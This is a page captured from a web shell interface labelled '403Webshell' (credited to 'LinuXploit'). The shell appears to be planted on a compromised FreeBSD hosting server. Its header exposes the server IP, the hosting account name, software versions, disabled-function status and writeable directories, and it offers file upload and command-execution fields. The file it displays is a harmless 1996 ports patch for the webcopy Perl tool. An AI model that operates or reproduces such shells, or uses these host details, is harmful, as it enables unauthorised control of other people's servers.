403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/www/webcopy/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/www/webcopy/files/patch-webcopy.src_1
*** webcopy.src.old	Sat Jun  8 20:42:14 1996
--- webcopy.src	Sun Sep 15 20:14:20 1996
***************
*** 1,4 ****
! #!%PERL% -- # -*- perl -*-
  eval 'exec %PERL% -S $0 "$*"'
      if undef;
  #
--- 1,4 ----
! #!%PERL% --
  eval 'exec %PERL% -S $0 "$*"'
      if undef;
  #
***************
*** 275,280 ****
--- 275,281 ----
  		    &check_tag("OVERLAY", "SRC",        $image) ||
  		    &check_tag("BODY",    "BACKGROUND", $image) ||
  		    &check_tag("TABLE",   "BACKGROUND", $image) ||
+ 		    &check_tag("EMBED",   "SRC",        $image) ||
  		    &check_tag("BGSOUND", "SRC",        $image) ||
  		    &check_tag("FRAME",   "SRC",        $link)  ||
  		    &check_tag("AREA",    "HREF",       $link)  ||
***************
*** 316,323 ****
  	($quote)=$value=~/^([\"\'])/;
  	if ($quote) {
  	    if ($value!~/.$quote$/) {
! 		($_,$etc)=$etc=~/^([^$quote]*)$quote?(.*)$/;
! 		$value.=$_.$quote;
  	    }
  	    $value=~s/$quote\s*(.*)\s*$quote$/$1/;
  	    $value=~s/\s*$//;
--- 317,324 ----
  	($quote)=$value=~/^([\"\'])/;
  	if ($quote) {
  	    if ($value!~/.$quote$/) {
! 		($_,$etc)=$value=~/^($quote[^$quote]*)$quote?(.*)$/;
! 		$value=$_.$quote;
  	    }
  	    $value=~s/$quote\s*(.*)\s*$quote$/$1/;
  	    $value=~s/\s*$//;
***************
*** 460,466 ****
      local($url,$file)=@_;
      local($status,$code,$info,$line,$length,$html,$redirect,$update,$data,
  	  $bytes,$step,$slice);
!     if ($useremote || $userpass) {
  	$update="Pragma: no-cache${rn}";
      } else {
  	(($update=(($_=&get_date($file))) &&
--- 461,467 ----
      local($url,$file)=@_;
      local($status,$code,$info,$line,$length,$html,$redirect,$update,$data,
  	  $bytes,$step,$slice);
!     if ($useremote) {
  	$update="Pragma: no-cache${rn}";
      } else {
  	(($update=(($_=&get_date($file))) &&

Youez - 2016 - github.com/yon3zu
LinuXploit